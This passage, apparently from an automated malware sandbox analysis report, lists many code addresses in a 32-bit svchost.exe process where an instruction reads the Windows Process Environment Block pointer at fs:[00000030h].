Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035D8350 mov ecx, dword ptr fs:[00000030h] 1_2_035D8350
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h] 1_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h] 1_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h] 1_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h] 1_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h] 1_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h] 1_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h] 1_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h] 1_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h] 1_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h] 1_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h] 1_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h] 1_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h] 1_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h] 1_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h] 1_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035D437C mov eax, dword ptr fs:[00000030h] 1_2_035D437C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0360634F mov eax, dword ptr fs:[00000030h] 1_2_0360634F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0352C310 mov ecx, dword ptr fs:[00000030h] 1_2_0352C310
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03608324 mov eax, dword ptr fs:[00000030h] 1_2_03608324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03608324 mov ecx, dword ptr fs:[00000030h] 1_2_03608324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03608324 mov eax, dword ptr fs:[00000030h] 1_2_03608324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03608324 mov eax, dword ptr fs:[00000030h] 1_2_03608324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03550310 mov ecx, dword ptr fs:[00000030h] 1_2_03550310
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0356A30B mov eax, dword ptr fs:[00000030h] 1_2_0356A30B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0356A30B mov eax, dword ptr fs:[00000030h] 1_2_0356A30B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0356A30B mov eax, dword ptr fs:[00000030h] 1_2_0356A30B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035DE3DB mov eax, dword ptr fs:[00000030h] 1_2_035DE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035DE3DB mov eax, dword ptr fs:[00000030h] 1_2_035DE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035DE3DB mov ecx, dword ptr fs:[00000030h] 1_2_035DE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035DE3DB mov eax, dword ptr fs:[00000030h] 1_2_035DE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035D43D4 mov eax, dword ptr fs:[00000030h] 1_2_035D43D4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035D43D4 mov eax, dword ptr fs:[00000030h] 1_2_035D43D4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035EC3CD mov eax, dword ptr fs:[00000030h] 1_2_035EC3CD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0353A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0353A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0353A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0353A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0353A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0353A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0353A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0353A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0353A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0353A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0353A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0353A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035383C0 mov eax, dword ptr fs:[00000030h] 1_2_035383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035383C0 mov eax, dword ptr fs:[00000030h] 1_2_035383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035383C0 mov eax, dword ptr fs:[00000030h] 1_2_035383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035383C0 mov eax, dword ptr fs:[00000030h] 1_2_035383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035B63C0 mov eax, dword ptr fs:[00000030h] 1_2_035B63C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0354E3F0 mov eax, dword ptr fs:[00000030h] 1_2_0354E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0354E3F0 mov eax, dword ptr fs:[00000030h] 1_2_0354E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0354E3F0 mov eax, dword ptr fs:[00000030h] 1_2_0354E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035663FF mov eax, dword ptr fs:[00000030h] 1_2_035663FF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035403E9 mov eax, dword ptr fs:[00000030h] 1_2_035403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035403E9 mov eax, dword ptr fs:[00000030h] 1_2_035403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035403E9 mov eax, dword ptr fs:[00000030h] 1_2_035403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035403E9 mov eax, dword ptr fs:[00000030h] 1_2_035403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035403E9 mov eax, dword ptr fs:[00000030h] 1_2_035403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035403E9 mov eax, dword ptr fs:[00000030h] 1_2_035403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035403E9 mov eax, dword ptr fs:[00000030h] 1_2_035403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035403E9 mov eax, dword ptr fs:[00000030h] 1_2_035403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03528397 mov eax, dword ptr fs:[00000030h] 1_2_03528397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03528397 mov eax, dword ptr fs:[00000030h] 1_2_03528397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03528397 mov eax, dword ptr fs:[00000030h] 1_2_03528397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0352E388 mov eax, dword ptr fs:[00000030h] 1_2_0352E388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0352E388 mov eax, dword ptr fs:[00000030h] 1_2_0352E388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0352E388 mov eax, dword ptr fs:[00000030h] 1_2_0352E388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0355438F mov eax, dword ptr fs:[00000030h] 1_2_0355438F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0355438F mov eax, dword ptr fs:[00000030h] 1_2_0355438F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0352A250 mov eax, dword ptr fs:[00000030h] 1_2_0352A250
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03536259 mov eax, dword ptr fs:[00000030h] 1_2_03536259
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035EA250 mov eax, dword ptr fs:[00000030h] 1_2_035EA250
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035EA250 mov eax, dword ptr fs:[00000030h] 1_2_035EA250
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035B8243 mov eax, dword ptr fs:[00000030h] 1_2_035B8243
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035B8243 mov ecx, dword ptr fs:[00000030h] 1_2_035B8243
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035E0274 mov eax, dword ptr fs:[00000030h] 1_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035E0274 mov eax, dword ptr fs:[00000030h] 1_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035E0274 mov eax, dword ptr fs:[00000030h] 1_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035E0274 mov eax, dword ptr fs:[00000030h] 1_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035E0274 mov eax, dword ptr fs:[00000030h] 1_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035E0274 mov eax, dword ptr fs:[00000030h] 1_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035E0274 mov eax, dword ptr fs:[00000030h] 1_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035E0274 mov eax, dword ptr fs:[00000030h] 1_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035E0274 mov eax, dword ptr fs:[00000030h] 1_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035E0274 mov eax, dword ptr fs:[00000030h] 1_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035E0274 mov eax, dword ptr fs:[00000030h] 1_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035E0274 mov eax, dword ptr fs:[00000030h] 1_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03534260 mov eax, dword ptr fs:[00000030h] 1_2_03534260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03534260 mov eax, dword ptr fs:[00000030h] 1_2_03534260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03534260 mov eax, dword ptr fs:[00000030h] 1_2_03534260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0352826B mov eax, dword ptr fs:[00000030h] 1_2_0352826B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0360625D mov eax, dword ptr fs:[00000030h] 1_2_0360625D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0352823B mov eax, dword ptr fs:[00000030h] 1_2_0352823B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0353A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0353A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0353A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0353A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0353A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0353A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0353A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0353A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0353A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0353A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035402E1 mov eax, dword ptr fs:[00000030h] 1_2_035402E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035402E1 mov eax, dword ptr fs:[00000030h] 1_2_035402E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035402E1 mov eax, dword ptr fs:[00000030h] 1_2_035402E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036062D6 mov eax, dword ptr fs:[00000030h] 1_2_036062D6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0356E284 mov eax, dword ptr fs:[00000030h] 1_2_0356E284
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0356E284 mov eax, dword ptr fs:[00000030h] 1_2_0356E284
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035B0283 mov eax, dword ptr fs:[00000030h] 1_2_035B0283
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035B0283 mov eax, dword ptr fs:[00000030h] 1_2_035B0283
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035B0283 mov eax, dword ptr fs:[00000030h] 1_2_035B0283
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035402A0 mov eax, dword ptr fs:[00000030h] 1_2_035402A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035402A0 mov eax, dword ptr fs:[00000030h] 1_2_035402A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035C62A0 mov eax, dword ptr fs:[00000030h] 1_2_035C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035C62A0 mov ecx, dword ptr fs:[00000030h] 1_2_035C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035C62A0 mov eax, dword ptr fs:[00000030h] 1_2_035C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035C62A0 mov eax, dword ptr fs:[00000030h] 1_2_035C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035C62A0 mov eax, dword ptr fs:[00000030h] 1_2_035C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035C62A0 mov eax, dword ptr fs:[00000030h] 1_2_035C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0352C156 mov eax, dword ptr fs:[00000030h] 1_2_0352C156
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035C8158 mov eax, dword ptr fs:[00000030h] 1_2_035C8158
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03604164 mov eax, dword ptr fs:[00000030h] 1_2_03604164
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03604164 mov eax, dword ptr fs:[00000030h] 1_2_03604164
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03536154 mov eax, dword ptr fs:[00000030h] 1_2_03536154
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03536154 mov eax, dword ptr fs:[00000030h] 1_2_03536154
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035C4144 mov eax, dword ptr fs:[00000030h] 1_2_035C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035C4144 mov eax, dword ptr fs:[00000030h] 1_2_035C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035C4144 mov ecx, dword ptr fs:[00000030h] 1_2_035C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035C4144 mov eax, dword ptr fs:[00000030h] 1_2_035C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035C4144 mov eax, dword ptr fs:[00000030h] 1_2_035C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035DA118 mov ecx, dword ptr fs:[00000030h] 1_2_035DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035DA118 mov eax, dword ptr fs:[00000030h] 1_2_035DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035DA118 mov eax, dword ptr fs:[00000030h] 1_2_035DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035DA118 mov eax, dword ptr fs:[00000030h] 1_2_035DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035F0115 mov eax, dword ptr fs:[00000030h] 1_2_035F0115
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035DE10E mov eax, dword ptr fs:[00000030h] 1_2_035DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035DE10E mov ecx, dword ptr fs:[00000030h] 1_2_035DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035DE10E mov eax, dword ptr fs:[00000030h] 1_2_035DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035DE10E mov eax, dword ptr fs:[00000030h] 1_2_035DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035DE10E mov ecx, dword ptr fs:[00000030h] 1_2_035DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035DE10E mov eax, dword ptr fs:[00000030h] 1_2_035DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035DE10E mov eax, dword ptr fs:[00000030h] 1_2_035DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035DE10E mov ecx, dword ptr fs:[00000030h] 1_2_035DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035DE10E mov eax, dword ptr fs:[00000030h] 1_2_035DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035DE10E mov ecx, dword ptr fs:[00000030h] 1_2_035DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03560124 mov eax, dword ptr fs:[00000030h] 1_2_03560124
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036061E5 mov eax, dword ptr fs:[00000030h] 1_2_036061E5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035AE1D0 mov eax, dword ptr fs:[00000030h] 1_2_035AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035AE1D0 mov eax, dword ptr fs:[00000030h] 1_2_035AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035AE1D0 mov ecx, dword ptr fs:[00000030h] 1_2_035AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035AE1D0 mov eax, dword ptr fs:[00000030h] 1_2_035AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035AE1D0 mov eax, dword ptr fs:[00000030h] 1_2_035AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035F61C3 mov eax, dword ptr fs:[00000030h] 1_2_035F61C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035F61C3 mov eax, dword ptr fs:[00000030h] 1_2_035F61C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035601F8 mov eax, dword ptr fs:[00000030h] 1_2_035601F8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035B019F mov eax, dword ptr fs:[00000030h] 1_2_035B019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035B019F mov eax, dword ptr fs:[00000030h] 1_2_035B019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035B019F mov eax, dword ptr fs:[00000030h] 1_2_035B019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035B019F mov eax, dword ptr fs:[00000030h] 1_2_035B019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0352A197 mov eax, dword ptr fs:[00000030h] 1_2_0352A197
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0352A197 mov eax, dword ptr fs:[00000030h] 1_2_0352A197
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0352A197 mov eax, dword ptr fs:[00000030h] 1_2_0352A197
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03570185 mov eax, dword ptr fs:[00000030h] 1_2_03570185
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035EC188 mov eax, dword ptr fs:[00000030h] 1_2_035EC188
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035EC188 mov eax, dword ptr fs:[00000030h] 1_2_035EC188
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035D4180 mov eax, dword ptr fs:[00000030h] 1_2_035D4180
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035D4180 mov eax, dword ptr fs:[00000030h] 1_2_035D4180
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03532050 mov eax, dword ptr fs:[00000030h] 1_2_03532050
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035B6050 mov eax, dword ptr fs:[00000030h] 1_2_035B6050
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0355C073 mov eax, dword ptr fs:[00000030h] 1_2_0355C073
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0354E016 mov eax, dword ptr fs:[00000030h] 1_2_0354E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0354E016 mov eax, dword ptr fs:[00000030h] 1_2_0354E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0354E016 mov eax, dword ptr fs:[00000030h] 1_2_0354E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0354E016 mov eax, dword ptr fs:[00000030h] 1_2_0354E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035B4000 mov ecx, dword ptr fs:[00000030h] 1_2_035B4000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035D2000 mov eax, dword ptr fs:[00000030h] 1_2_035D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035D2000 mov eax, dword ptr fs:[00000030h] 1_2_035D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035D2000 mov eax, dword ptr fs:[00000030h] 1_2_035D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035D2000 mov eax, dword ptr fs:[00000030h] 1_2_035D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035D2000 mov eax, dword ptr fs:[00000030h] 1_2_035D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035D2000 mov eax, dword ptr fs:[00000030h] 1_2_035D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035D2000 mov eax, dword ptr fs:[00000030h] 1_2_035D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035D2000 mov eax, dword ptr fs:[00000030h] 1_2_035D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035C6030 mov eax, dword ptr fs:[00000030h] 1_2_035C6030
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0352A020 mov eax, dword ptr fs:[00000030h] 1_2_0352A020
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0352C020 mov eax, dword ptr fs:[00000030h] 1_2_0352C020
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035B20DE mov eax, dword ptr fs:[00000030h] 1_2_035B20DE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0352C0F0 mov eax, dword ptr fs:[00000030h] 1_2_0352C0F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035720F0 mov ecx, dword ptr fs:[00000030h] 1_2_035720F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0352A0E3 mov ecx, dword ptr fs:[00000030h] 1_2_0352A0E3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035380E9 mov eax, dword ptr fs:[00000030h] 1_2_035380E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035B60E0 mov eax, dword ptr fs:[00000030h] 1_2_035B60E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0353208A mov eax, dword ptr fs:[00000030h] 1_2_0353208A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035F60B8 mov eax, dword ptr fs:[00000030h] 1_2_035F60B8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035F60B8 mov ecx, dword ptr fs:[00000030h] 1_2_035F60B8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035280A0 mov eax, dword ptr fs:[00000030h] 1_2_035280A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035C80A8 mov eax, dword ptr fs:[00000030h] 1_2_035C80A8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03530750 mov eax, dword ptr fs:[00000030h] 1_2_03530750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035BE75D mov eax, dword ptr fs:[00000030h] 1_2_035BE75D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572750 mov eax, dword ptr fs:[00000030h] 1_2_03572750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572750 mov eax, dword ptr fs:[00000030h] 1_2_03572750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035B4755 mov eax, dword ptr fs:[00000030h] 1_2_035B4755
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0356674D mov esi, dword ptr fs:[00000030h] 1_2_0356674D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0356674D mov eax, dword ptr fs:[00000030h] 1_2_0356674D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0356674D mov eax, dword ptr fs:[00000030h] 1_2_0356674D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03538770 mov eax, dword ptr fs:[00000030h] 1_2_03538770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03540770 mov eax, dword ptr fs:[00000030h] 1_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03540770 mov eax, dword ptr fs:[00000030h] 1_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03540770 mov eax, dword ptr fs:[00000030h] 1_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03540770 mov eax, dword ptr fs:[00000030h] 1_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03540770 mov eax, dword ptr fs:[00000030h] 1_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03540770 mov eax, dword ptr fs:[00000030h] 1_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03540770 mov eax, dword ptr fs:[00000030h] 1_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03540770 mov eax, dword ptr fs:[00000030h] 1_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03540770 mov eax, dword ptr fs:[00000030h] 1_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03540770 mov eax, dword ptr fs:[00000030h] 1_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03540770 mov eax, dword ptr fs:[00000030h] 1_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03540770 mov eax, dword ptr fs:[00000030h] 1_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03530710 mov eax, dword ptr fs:[00000030h] 1_2_03530710
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03560710 mov eax, dword ptr fs:[00000030h] 1_2_03560710
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0356C700 mov eax, dword ptr fs:[00000030h] 1_2_0356C700
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0356273C mov eax, dword ptr fs:[00000030h] 1_2_0356273C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0356273C mov ecx, dword ptr fs:[00000030h] 1_2_0356273C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0356273C mov eax, dword ptr fs:[00000030h] 1_2_0356273C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035AC730 mov eax, dword ptr fs:[00000030h] 1_2_035AC730
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0356C720 mov eax, dword ptr fs:[00000030h] 1_2_0356C720
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0356C720 mov eax, dword ptr fs:[00000030h] 1_2_0356C720
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0353C7C0 mov eax, dword ptr fs:[00000030h] 1_2_0353C7C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035B07C3 mov eax, dword ptr fs:[00000030h] 1_2_035B07C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035347FB mov eax, dword ptr fs:[00000030h] 1_2_035347FB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035347FB mov eax, dword ptr fs:[00000030h] 1_2_035347FB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035527ED mov eax, dword ptr fs:[00000030h] 1_2_035527ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035527ED mov eax, dword ptr fs:[00000030h] 1_2_035527ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035527ED mov eax, dword ptr fs:[00000030h] 1_2_035527ED
